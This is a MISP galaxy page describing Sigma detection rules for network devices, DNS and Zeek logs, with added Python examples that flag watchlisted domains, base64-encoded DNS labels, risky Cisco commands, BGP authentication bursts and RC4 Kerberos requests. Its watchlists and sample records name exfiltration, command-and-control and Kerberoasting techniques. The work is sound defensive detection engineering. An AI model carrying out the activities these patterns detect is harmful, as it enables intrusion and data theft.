
Sigma-Rules

MISP galaxy cluster based on Sigma Rules.

Authors and/or Contributors
@Joseliyo_Jstnk

Juniper BGP Missing MD5

Detects Juniper BGP messages with a missing MD5 digest, which may be indicative of brute-force attacks to manipulate routing.

Internal MISP references

UUID a7c0ae48-8df8-42bf-91bd-2ea57e2f9d43 which can be used as unique global reference for Juniper BGP Missing MD5 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Brown
creation_date 2023/01/09
falsepositive ['Unlikely. Except due to misconfigurations']
filename juniper_bgp_missing_md5.yml
level low
logsource.category No established category
logsource.product juniper
tags ['attack.initial_access', 'attack.persistence', 'attack.privilege_escalation', 'attack.defense_evasion', 'attack.credential_access', 'attack.collection', 'attack.t1078', 'attack.t1110', 'attack.t1557']

Cleartext Protocol Usage

Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that encryption is used for all sensitive information in transit. Ensure that an encrypted channel is used for all administrative account access.

Internal MISP references

UUID d7fb8f0e-bd5f-45c2-b467-19571c490d7e which can be used as unique global reference for Cleartext Protocol Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexandr Yampolskyi, SOC Prime, Tim Shelton
creation_date 2019/03/26
falsepositive ['Unknown']
filename net_firewall_cleartext_protocols.yml
level low
logsource.category firewall
logsource.product No established product
tags ['attack.credential_access']

Telegram Bot API Request

Detects suspicious DNS queries to api.telegram.org, the endpoint used by Telegram bots of any kind

Internal MISP references

UUID c64c5175-5189-431b-a55e-6d9882158251 which can be used as unique global reference for Telegram Bot API Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/06/05
falsepositive ['Legitimate use of Telegram bots in the company']
filename net_dns_susp_telegram_api.yml
level medium
logsource.category dns
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1102.002']

DNS Query to External Service Interaction Domains

Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE

Internal MISP references

UUID aff715fa-4dd5-497a-8db3-910bea555566 which can be used as unique global reference for DNS Query to External Service Interaction Domains in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Matt Kelly (list of domains)
creation_date 2022/06/07
falsepositive ['Unknown']
filename net_dns_external_service_interaction_domains.yml
level high
logsource.category dns
logsource.product No established product
tags ['attack.initial_access', 'attack.t1190', 'attack.reconnaissance', 'attack.t1595.002']

Cobalt Strike DNS Beaconing

Detects suspicious DNS queries known from Cobalt Strike beacons

Internal MISP references

UUID 2975af79-28c4-4d2f-a951-9095f229df29 which can be used as unique global reference for Cobalt Strike DNS Beaconing in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/05/10
falsepositive ['Unknown']
filename net_dns_mal_cobaltstrike.yml
level critical
logsource.category dns
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.004']

DNS TXT Answer with Possible Execution Strings

Detects strings used in command execution appearing in DNS TXT answers

Internal MISP references

UUID 8ae51330-899c-4641-8125-e39f2e07da72 which can be used as unique global reference for DNS TXT Answer with Possible Execution Strings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2018/08/08
falsepositive ['Unknown']
filename net_dns_susp_txt_exec_strings.yml
level high
logsource.category dns
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.004']

Suspicious DNS Query with B64 Encoded String

Detects suspicious DNS queries using base64 encoding

Internal MISP references

UUID 4153a907-2451-4e4f-a578-c52bb6881432 which can be used as unique global reference for Suspicious DNS Query with B64 Encoded String in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/05/10
falsepositive ['Unknown']
filename net_dns_susp_b64_queries.yml
level medium
logsource.category dns
logsource.product No established product
tags ['attack.exfiltration', 'attack.t1048.003', 'attack.command_and_control', 'attack.t1071.004']

Wannacry Killswitch Domain

Detects DNS queries for the WannaCry killswitch domain

Internal MISP references

UUID 3eaf6218-3bed-4d8a-8707-274096f12a18 which can be used as unique global reference for Wannacry Killswitch Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mike Wade
creation_date 2020/09/16
falsepositive ['Analyst testing']
filename net_dns_wannacry_killswitch_domain.yml
level high
logsource.category dns
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
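
The DNS rules above (external service interaction domains, the Telegram Bot API host, base64-encoded query strings, the WannaCry killswitch domain) reduce to two checks on the query name: a label-boundary suffix match against a domain list, and a heuristic for encoded labels. The following is an added example of both checks run over constructed query records. It is not code from the MISP galaxy or from the Sigma rules; the watchlist entries, categories and thresholds are this example's own illustrative choices, not the rules' lists.

```python
"""Added example (not part of the MISP galaxy or the Sigma rules it lists):
triage of DNS query names using only the standard library.

  1. label-boundary suffix matching against a small watchlist (out-of-band
     interaction services, the Telegram Bot API host, the WannaCry
     killswitch domain). Illustrative subset, not the rules' own lists.
  2. a heuristic for base64-looking labels in the query name.
"""
import base64
import math
import re

# Illustrative watchlist; categories and entries are this example's own.
WATCHLIST = {
    "burpcollaborator.net": "external-service-interaction",
    "interact.sh": "external-service-interaction",
    "api.telegram.org": "telegram-bot-api",
    "iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com": "wannacry-killswitch",
}

B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+$")


def normalize(qname: str) -> str:
    """Lower-case and strip the trailing root dot so matching is stable."""
    return qname.rstrip(".").lower()


def watchlist_hit(qname: str, watchlist=WATCHLIST):
    """Return the category if qname is a watchlisted domain or a subdomain of one.

    The boundary check ("." + domain) keeps notburpcollaborator.net from
    matching burpcollaborator.net, which a plain substring test would do.
    """
    q = normalize(qname)
    for domain, category in watchlist.items():
        if q == domain or q.endswith("." + domain):
            return category
    return None


def shannon_entropy(s: str) -> float:
    """Bits per character; a 32-char base64 payload lands around 3.5-4.5."""
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def base64_like_labels(qname: str, min_len: int = 20, min_entropy: float = 3.0):
    """Return labels that look like base64 payloads.

    Heuristic with this example's own thresholds: long enough to carry data,
    restricted to the base64 alphabet, mixed case plus at least one digit,
    and high character entropy. Hyphenated hostnames fail the alphabet test,
    single-case words fail the case-mix test. Runs on the raw label because
    lower-casing would destroy the case signal.
    """
    hits = []
    for label in qname.rstrip(".").split("."):
        if len(label) < min_len or not B64_ALPHABET.match(label):
            continue
        if not (any(c.islower() for c in label) and any(c.isupper() for c in label)
                and any(c.isdigit() for c in label)):
            continue
        if shannon_entropy(label) >= min_entropy:
            hits.append(label)
    return hits


def triage(records):
    """records: iterable of (src_ip, qname). Returns (src, qname, finding) tuples."""
    findings = []
    for src, qname in records:
        cat = watchlist_hit(qname)
        if cat:
            findings.append((src, qname, cat))
        for label in base64_like_labels(qname):
            findings.append((src, qname, "base64-like-label:" + label))
    return findings


# Constructed sample queries (not real telemetry). The encoded label is
# base64 of a fabricated "hostname=ws01;user=alice" string.
ENCODED = base64.b64encode(b"hostname=ws01;user=alice").decode().rstrip("=")
SAMPLE_RECORDS = [
    ("10.0.0.5", "www.example.com"),
    ("10.0.0.5", "x7q2.burpcollaborator.net."),
    ("10.0.0.6", "notburpcollaborator.net"),
    ("10.0.0.7", "api.telegram.org"),
    ("10.0.0.8", "iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"),
    ("10.0.0.9", ENCODED + ".exfil.example"),
    ("10.0.0.9", "cloudfront-static-assets.example.net"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS):
        print(finding)
```

On the constructed records this yields four findings: the collaborator subdomain, the Telegram API host, the killswitch domain and the encoded label; notburpcollaborator.net and the hyphenated CDN hostname pass clean. Tune min_len and min_entropy against your own resolver logs before alerting on the heuristic, since long randomized labels are also common in legitimate CDN and telemetry traffic.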

Monero Crypto Coin Mining Pool Lookup

Detects suspicious DNS queries to Monero mining pools

Internal MISP references

UUID b593fd50-7335-4682-a36c-4edcb68e4641 which can be used as unique global reference for Monero Crypto Coin Mining Pool Lookup in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/10/24
falsepositive ['Legitimate crypto coin mining']
filename net_dns_pua_cryptocoin_mining_xmr.yml
level high
logsource.category dns
logsource.product No established product
tags ['attack.impact', 'attack.t1496', 'attack.t1567']

Cisco Discovery

Find information about network devices that is not stored in config files

Internal MISP references

UUID 9705a6a1-6db6-4a16-a987-15b7151e299b which can be used as unique global reference for Cisco Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/12
falsepositive ['Commonly used by administrators for troubleshooting']
filename cisco_cli_discovery.yml
level low
logsource.category No established category
logsource.product cisco
tags ['attack.discovery', 'attack.t1083', 'attack.t1201', 'attack.t1057', 'attack.t1018', 'attack.t1082', 'attack.t1016', 'attack.t1049', 'attack.t1033', 'attack.t1124']

Cisco Modify Configuration

Detects modifications to a configuration that serve an adversary's impact or persistence goals

Internal MISP references

UUID 671ffc77-50a7-464f-9e3d-9ea2b493b26b which can be used as unique global reference for Cisco Modify Configuration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/12
falsepositive ['Legitimate administrators may run these commands']
filename cisco_cli_modify_config.yml
level medium
logsource.category No established category
logsource.product cisco
tags ['attack.persistence', 'attack.impact', 'attack.t1490', 'attack.t1505', 'attack.t1565.002', 'attack.t1053']

Cisco File Deletion

See what files are being deleted from flash file systems

Internal MISP references

UUID 71d65515-c436-43c0-841b-236b1f32c21e which can be used as unique global reference for Cisco File Deletion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/12
falsepositive ['Will be used sometimes by admins to clean up local flash space']
filename cisco_cli_file_deletion.yml
level medium
logsource.category No established category
logsource.product cisco
tags ['attack.defense_evasion', 'attack.impact', 'attack.t1070.004', 'attack.t1561.001', 'attack.t1561.002']

Cisco Stage Data

Various protocols may be used to put data on the device for exfiltration or infiltration

Internal MISP references

UUID 5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59 which can be used as unique global reference for Cisco Stage Data in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/12
falsepositive ['Generally used to copy configs or IOS images']
filename cisco_cli_moving_data.yml
level low
logsource.category No established category
logsource.product cisco
tags ['attack.collection', 'attack.lateral_movement', 'attack.command_and_control', 'attack.exfiltration', 'attack.t1074', 'attack.t1105', 'attack.t1560.001']

Cisco Show Commands Input

See what commands are being input into the device by other users; full credentials can be present in the history

Internal MISP references

UUID b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b which can be used as unique global reference for Cisco Show Commands Input in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/11
falsepositive ['Not commonly run by administrators, especially if remote logging is configured']
filename cisco_cli_input_capture.yml
level medium
logsource.category No established category
logsource.product cisco
tags ['attack.credential_access', 'attack.t1552.003']

Cisco Collect Data

Collect pertinent data from the configuration files

Internal MISP references

UUID cd072b25-a418-4f98-8ebc-5093fb38fe1a which can be used as unique global reference for Cisco Collect Data in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/11
falsepositive ['Commonly run by administrators']
filename cisco_cli_collect_data.yml
level low
logsource.category No established category
logsource.product cisco
tags ['attack.discovery', 'attack.credential_access', 'attack.collection', 'attack.t1087.001', 'attack.t1552.001', 'attack.t1005']

Cisco Disabling Logging

Detects logging being turned off, locally or remotely

Internal MISP references

UUID 9e8f6035-88bf-4a63-96b6-b17c0508257e which can be used as unique global reference for Cisco Disabling Logging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/11
falsepositive ['Unknown']
filename cisco_cli_disable_logging.yml
level high
logsource.category No established category
logsource.product cisco
tags ['attack.defense_evasion', 'attack.t1562.001']

Cisco Denial of Service

Detects a system being shut down or put into a different boot mode

Internal MISP references

UUID d94a35f0-7a29-45f6-90a0-80df6159967c which can be used as unique global reference for Cisco Denial of Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/15
falsepositive ['Legitimate administrators may run these commands, though rarely.']
filename cisco_cli_dos.yml
level medium
logsource.category No established category
logsource.product cisco
tags ['attack.impact', 'attack.t1495', 'attack.t1529', 'attack.t1565.001']

Cisco Sniffing

Show when a monitor session or a SPAN/RSPAN is set up or modified

Internal MISP references

UUID b9e1f193-d236-4451-aaae-2f3d2102120d which can be used as unique global reference for Cisco Sniffing in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/11
falsepositive ['Admins may setup new or modify old spans, or use a monitor for troubleshooting']
filename cisco_cli_net_sniff.yml
level medium
logsource.category No established category
logsource.product cisco
tags ['attack.credential_access', 'attack.discovery', 'attack.t1040']

Cisco Local Accounts

Find local accounts being created or modified as well as remote authentication configurations

Internal MISP references

UUID 6d844f0f-1c18-41af-8f19-33e7654edfc3 which can be used as unique global reference for Cisco Local Accounts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/12
falsepositive ['When remote authentication is in place, this should not change often']
filename cisco_cli_local_accounts.yml
level high
logsource.category No established category
logsource.product cisco
tags ['attack.persistence', 'attack.t1136.001', 'attack.t1098']

Cisco Crypto Commands

Show when private keys are being exported from the device, or when new certificates are installed

Internal MISP references

UUID 1f978c6a-4415-47fb-aca5-736a44d7ca3d which can be used as unique global reference for Cisco Crypto Commands in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/12
falsepositive ['Not commonly run by administrators. Also whitelist your known good certificates']
filename cisco_cli_crypto_actions.yml
level high
logsource.category No established category
logsource.product cisco
tags ['attack.credential_access', 'attack.defense_evasion', 'attack.t1553.004', 'attack.t1552.004']

Cisco Clear Logs

Clear command history in network OS which is used for defense evasion

Internal MISP references

UUID ceb407f6-8277-439b-951f-e4210e3ed956 which can be used as unique global reference for Cisco Clear Logs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/12
falsepositive ['Legitimate administrators may run these commands']
filename cisco_cli_clear_logs.yml
level high
logsource.category No established category
logsource.product cisco
tags ['attack.defense_evasion', 'attack.t1070.003']
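
The Cisco CLI rules above all key on the command text an operator typed: disabling logging, clearing logs, creating local accounts, configuring SPAN sessions, exporting keys, or rebooting the device. The following is an added example, not code from the galaxy page or from the Sigma rules, that extracts commands from IOS configuration-logging syslog messages and classifies them into those themes. It assumes the `%PARSER-5-CFGLOG_LOGGEDCMD: User:<name> logged command:<command>` format produced when `archive / log config / logging enable / notify syslog` is configured; EXEC-mode commands such as `clear logging` or `reload` are not config commands and normally arrive through AAA command accounting instead, so the classifier is written to work on bare command text from either feed. The patterns and sample lines are this example's own, not the rules' detection lists.

```python
"""Added example (not part of the galaxy page or the Sigma rules above):
classify Cisco IOS commands from syslog into detection themes.

Assumed message format (constructed here):
  %PARSER-5-CFGLOG_LOGGEDCMD: User:<name>  logged command:<command>
EXEC commands (clear logging, reload, show ...) normally come from AAA
command accounting rather than CFGLOG; classify_command() accepts the bare
command string so either source can feed it.
"""
import re

CFGLOG_RE = re.compile(
    r"%PARSER-5-CFGLOG_LOGGEDCMD: User:(?P<user>\S+)\s+logged command:(?P<cmd>.*)$"
)

# (theme, pattern) pairs; illustrative, not the Sigma rules' own lists.
PATTERNS = [
    ("disable_logging", re.compile(
        r"^no\s+(logging|aaa\s+new-model|snmp-server\s+enable\s+traps)\b")),
    ("clear_logs", re.compile(r"^clear\s+(logging|archive\s+log\s+config)\b")),
    ("local_accounts", re.compile(
        r"^(username\s+\S+|enable\s+(secret|password)|(no\s+)?aaa\s+authentication\s+login)\b")),
    ("sniffing", re.compile(r"^monitor\s+(session|capture)\b")),
    ("crypto", re.compile(r"^crypto\s+(key\s+export|pki\s+(import|trustpoint))\b")),
    ("denial_of_service", re.compile(r"^(reload|boot\s+system|config-register)\b")),
]


def classify_command(cmd: str):
    """Return the first matching theme for a bare IOS command, or None."""
    cmd = cmd.strip().lower()
    for theme, pat in PATTERNS:
        if pat.search(cmd):
            return theme
    return None


def parse_cfglog(line: str):
    """Return (user, command) from a CFGLOG syslog line, or None for other messages."""
    m = CFGLOG_RE.search(line)
    if not m:
        return None
    return m.group("user"), m.group("cmd").strip()


def triage(lines):
    """Return (user, command, theme) for every logged command that hits a theme."""
    findings = []
    for line in lines:
        parsed = parse_cfglog(line)
        if not parsed:
            continue
        user, cmd = parsed
        theme = classify_command(cmd)
        if theme:
            findings.append((user, cmd, theme))
    return findings


# Constructed syslog lines (not from a real device); the last one is a
# non-CFGLOG message to show it is ignored.
SAMPLE_LINES = [
    "<189>Jan  9 10:01:02 rtr1 101: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:interface GigabitEthernet0/1",
    "<189>Jan  9 10:01:09 rtr1 102: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:no logging host 10.10.0.5",
    "<189>Jan  9 10:01:15 rtr1 103: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:username svc-backup privilege 15 secret 5 <hash>",
    "<189>Jan  9 10:01:31 rtr1 104: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:monitor session 1 source interface Gi0/1",
    "<189>Jan  9 10:02:02 rtr1 105: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:crypto key export rsa ROUTER-KEY pem terminal 3des <passphrase>",
    "<189>Jan  9 10:02:40 rtr1 106: %SYS-5-CONFIG_I: Configured from console by admin on vty0 (10.10.0.9)",
]

if __name__ == "__main__":
    for user, cmd, theme in triage(SAMPLE_LINES):
        print(f"{theme:18s} {user}: {cmd}")
```

In this form the per-theme severity is left to the consumer; the false-positive notes on the rules above are the useful guide (a `username` change on a device that uses TACACS+ for authentication is far more interesting than one on a standalone switch, and `monitor session` from a known change window is routine).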

Cisco LDP Authentication Failures

Detects LDP MD5 authentication failures, which may be indicative of brute-force attacks to manipulate MPLS labels

Internal MISP references

UUID 50e606bf-04ce-4ca7-9d54-3449494bbd4b which can be used as unique global reference for Cisco LDP Authentication Failures in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Brown
creation_date 2023/01/09
falsepositive ['Unlikely. Except due to misconfigurations']
filename cisco_ldp_md5_auth_failed.yml
level low
logsource.category No established category
logsource.product cisco
tags ['attack.initial_access', 'attack.persistence', 'attack.privilege_escalation', 'attack.defense_evasion', 'attack.credential_access', 'attack.collection', 'attack.t1078', 'attack.t1110', 'attack.t1557']

Cisco BGP Authentication Failures

Detects BGP MD5 authentication failures, which may be indicative of brute-force attacks to manipulate routing

Internal MISP references

UUID 56fa3cd6-f8d6-4520-a8c7-607292971886 which can be used as unique global reference for Cisco BGP Authentication Failures in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Brown
creation_date 2023/01/09
falsepositive ['Unlikely. Except due to misconfigurations']
filename cisco_bgp_md5_auth_failed.yml
level low
logsource.category No established category
logsource.product cisco
tags ['attack.initial_access', 'attack.persistence', 'attack.privilege_escalation', 'attack.defense_evasion', 'attack.credential_access', 'attack.collection', 'attack.t1078', 'attack.t1110', 'attack.t1557']

Huawei BGP Authentication Failures

Detects BGP authentication failures, which may be indicative of brute-force attacks to manipulate routing.

Internal MISP references

UUID a557ffe6-ac54-43d2-ae69-158027082350 which can be used as unique global reference for Huawei BGP Authentication Failures in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Brown
creation_date 2023/01/09
falsepositive ['Unlikely. Except due to misconfigurations']
filename huawei_bgp_auth_failed.yml
level low
logsource.category No established category
logsource.product huawei
tags ['attack.initial_access', 'attack.persistence', 'attack.privilege_escalation', 'attack.defense_evasion', 'attack.credential_access', 'attack.collection', 'attack.t1078', 'attack.t1110', 'attack.t1557']
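
The BGP and LDP authentication-failure rules above (Juniper, Cisco and Huawei) are rated low and note that the main false positive is a misconfigured key. What separates that from the brute-force case they are meant to catch is the rate per peer: a key mismatch on a known neighbour produces a steady trickle for as long as the session keeps retrying, while guessing produces a burst from one source. The following is an added example, not code from the galaxy page or the Sigma rules, that parses constructed Cisco and Juniper messages and applies a sliding-window count per peer. The message formats are assumptions for this example (the Cisco `%TCP-6-BADAUTH` text and a Junos `tcp_auth_ok ... missing MD5 digest` line); the Huawei format is omitted because the page gives none, and timestamps are assumed to have been normalized to RFC 3339 by the log pipeline.

```python
"""Added example (not from the galaxy page or the Sigma rules above):
aggregate routing-protocol MD5 authentication failures per peer and label
each peer as a burst (possible brute force) or a trickle (likely key
mismatch on a known neighbour).

Assumed message formats, constructed for this example:
  Cisco IOS  %TCP-6-BADAUTH: Invalid MD5 digest from <peer>(<port>) to <local>(<port>)
  Juniper    tcp_auth_ok: Packet from <peer>:<port> missing MD5 digest
Line prefix assumed: "<RFC3339 UTC timestamp> <device> <message>".
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re

PATTERNS = {
    "cisco": re.compile(
        r"%TCP-6-BADAUTH: (?P<kind>Invalid|No) MD5 digest from (?P<peer>\d+\.\d+\.\d+\.\d+)\(\d+\)"),
    "juniper": re.compile(
        r"tcp_auth_ok: Packet from (?P<peer>\d+\.\d+\.\d+\.\d+):\d+ (?P<kind>missing MD5 digest)"),
}
TS_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})Z\s+(?P<host>\S+)\s+(?P<msg>.*)$")


def parse_event(line: str):
    """Return a dict for an MD5 auth-failure line, or None for anything else."""
    m = TS_RE.match(line)
    if not m:
        return None
    for vendor, pat in PATTERNS.items():
        hit = pat.search(m.group("msg"))
        if hit:
            return {
                "ts": datetime.fromisoformat(m.group("ts")),
                "device": m.group("host"),
                "vendor": vendor,
                "peer": hit.group("peer"),
                "kind": hit.group("kind"),
            }
    return None


def triage(lines, window=timedelta(seconds=60), burst_threshold=5):
    """Return {peer: (failure_count, verdict)}.

    verdict is "burst" if any sliding window of `window` holds at least
    `burst_threshold` failures from that peer, otherwise "trickle".
    """
    by_peer = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        if ev:
            by_peer[ev["peer"]].append(ev["ts"])
    result = {}
    for peer, stamps in by_peer.items():
        stamps.sort()
        verdict = "trickle"
        start = 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window:
                start += 1
            if end - start + 1 >= burst_threshold:
                verdict = "burst"
                break
        result[peer] = (len(stamps), verdict)
    return result


def _constructed_lines():
    # A known peer failing three times over an hour (key mismatch on a
    # retrying session), then twelve failures in ~24 s from an unknown source.
    lines = [
        "2023-01-09T10:00:00Z rtr1 %TCP-6-BADAUTH: Invalid MD5 digest from 192.0.2.10(179) to 192.0.2.1(31002)",
        "2023-01-09T10:30:00Z rtr1 %TCP-6-BADAUTH: Invalid MD5 digest from 192.0.2.10(179) to 192.0.2.1(31002)",
        "2023-01-09T11:00:00Z rtr1 %TCP-6-BADAUTH: Invalid MD5 digest from 192.0.2.10(179) to 192.0.2.1(31002)",
        "2023-01-09T11:00:05Z rtr1 %SYS-5-CONFIG_I: Configured from console by admin",
    ]
    for i in range(12):
        ts = datetime(2023, 1, 9, 11, 5, 0) + timedelta(seconds=2 + 2 * i)
        lines.append(f"{ts.isoformat()}Z edge2 tcp_auth_ok: Packet from 198.51.100.77:179 missing MD5 digest")
    return lines


SAMPLE_LINES = _constructed_lines()

if __name__ == "__main__":
    for peer, (count, verdict) in sorted(triage(SAMPLE_LINES).items()):
        print(f"{peer}: {count} failures, {verdict}")
```

Correlating the peer address against the configured neighbour list is the natural next step: a trickle from a configured neighbour is an operations ticket, while any failure from an address that is not a configured neighbour is worth escalating regardless of rate, since nothing legitimate should be speaking BGP or LDP to the box from there.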

Default Cobalt Strike Certificate

Detects the presence of default Cobalt Strike certificate in the HTTPS traffic

Internal MISP references

UUID 7100f7e3-92ce-4584-b7b7-01b40d3d4118 which can be used as unique global reference for Default Cobalt Strike Certificate in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2021/06/23
falsepositive ['Unknown']
filename zeek_default_cobalt_strike_certificate.yml
level high
logsource.category No established category
logsource.product zeek
tags ['attack.command_and_control', 'attack.s0154']

Publicly Accessible RDP Service

Detects connections from routable IPs to an RDP listener, which is indicative of a publicly accessible RDP service.

Internal MISP references

UUID 1fc0809e-06bf-4de3-ad52-25e5263b7623 which can be used as unique global reference for Publicly Accessible RDP Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Josh Brower @DefensiveDepth
creation_date 2020/08/22
falsepositive ['Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet.']
filename zeek_rdp_public_listener.yml
level high
logsource.category No established category
logsource.product zeek
tags ['attack.lateral_movement', 'attack.t1021.001']

Kerberos Network Traffic RC4 Ticket Encryption

Detects Kerberos TGS requests using RC4 encryption, which may be indicative of Kerberoasting

Internal MISP references

UUID 503fe26e-b5f2-4944-a126-eab405cc06e5 which can be used as unique global reference for Kerberos Network Traffic RC4 Ticket Encryption in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author sigma
creation_date 2020/02/12
falsepositive ['Normal enterprise SPN requests activity']
filename zeek_susp_kerberos_rc4.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.credential_access', 'attack.t1558.003']
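
Zeek's kerberos.log records the request type, the requested service principal and the negotiated cipher for each exchange, which is all this rule needs. The following is an added example, not code from the galaxy page or from the Sigma rule, that parses a constructed kerberos.log excerpt, selects TGS requests negotiated with rc4-hmac, and summarizes them per requesting host, since one client pulling RC4 service tickets for many distinct SPNs is the shape Kerberoasting takes. It assumes Zeek's tab-separated format with a `#fields` header (the header below is an abbreviated subset of the real kerberos.log columns, constructed for the example) and uses an allowlist of legacy SPNs known to require RC4, which is this example's own mechanism for handling the "normal enterprise SPN requests" false positive rather than the rule's filter.

```python
"""Added example (not part of the galaxy page or the Sigma rule above):
find TGS requests negotiated with rc4-hmac in a Zeek kerberos.log and
summarize them per requesting host.

Assumptions: Zeek TSV with a #fields header (subset of columns, constructed
here), and an allowlist of SPNs documented as RC4-only (this example's
device for the known false positive, not the rule's filter).
"""
from collections import defaultdict

RC4_OK_SPNS = {"legacy/erp01.corp.local"}  # assumed: documented RC4-only service


def parse_zeek_tsv(text: str):
    """Parse Zeek TSV into dicts keyed by the #fields header; '-' means unset."""
    fields, rows = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#"):
            continue
        elif fields:
            values = line.split("\t")
            rows.append({k: (None if v == "-" else v) for k, v in zip(fields, values)})
    return rows


def rc4_tgs_requests(rows, allowlist=RC4_OK_SPNS):
    """Rows where a TGS was requested with rc4-hmac for a non-allowlisted SPN."""
    hits = []
    for r in rows:
        if r.get("request_type") != "TGS" or r.get("cipher") != "rc4-hmac":
            continue
        if (r.get("service") or "").lower() in allowlist:
            continue
        hits.append(r)
    return hits


def per_source_summary(hits):
    """{id.orig_h: (rc4 TGS count, distinct SPNs)}; many SPNs from one host is the tell."""
    counts = defaultdict(int)
    spns = defaultdict(set)
    for r in hits:
        counts[r["id.orig_h"]] += 1
        spns[r["id.orig_h"]].add(r["service"])
    return {host: (counts[host], len(spns[host])) for host in counts}


# Constructed kerberos.log excerpt (not real telemetry; abbreviated columns).
SAMPLE_LOG = "\n".join([
    "#separator \\x09",
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\trequest_type\tclient\tservice\tsuccess\tcipher",
    "1673258400.1\tC1\t10.0.0.5\t49832\t10.0.0.2\t88\tAS\talice/CORP.LOCAL\tkrbtgt/CORP.LOCAL\tT\taes256-cts-hmac-sha1-96",
    "1673258401.2\tC2\t10.0.0.5\t49833\t10.0.0.2\t88\tTGS\talice/CORP.LOCAL\tHTTP/web01.corp.local\tT\taes256-cts-hmac-sha1-96",
    "1673258402.3\tC3\t10.0.0.5\t49834\t10.0.0.2\t88\tTGS\talice/CORP.LOCAL\tMSSQLSvc/sql01.corp.local:1433\tT\trc4-hmac",
    "1673258402.9\tC4\t10.0.0.5\t49835\t10.0.0.2\t88\tTGS\talice/CORP.LOCAL\tHTTP/intranet.corp.local\tT\trc4-hmac",
    "1673258403.4\tC5\t10.0.0.5\t49836\t10.0.0.2\t88\tTGS\talice/CORP.LOCAL\tlegacy/erp01.corp.local\tT\trc4-hmac",
    "1673258404.0\tC6\t10.0.0.9\t50211\t10.0.0.2\t88\tTGS\tbob/CORP.LOCAL\tcifs/fs01.corp.local\tT\taes128-cts-hmac-sha1-96",
    "1673258405.0\tC7\t10.0.0.9\t50212\t10.0.0.2\t88\tTGS\tbob/CORP.LOCAL\tldap/dc01.corp.local\tF\trc4-hmac",
])

if __name__ == "__main__":
    hits = rc4_tgs_requests(parse_zeek_tsv(SAMPLE_LOG))
    for host, (count, distinct) in per_source_summary(hits).items():
        print(f"{host}: {count} rc4 TGS requests across {distinct} SPNs")
```

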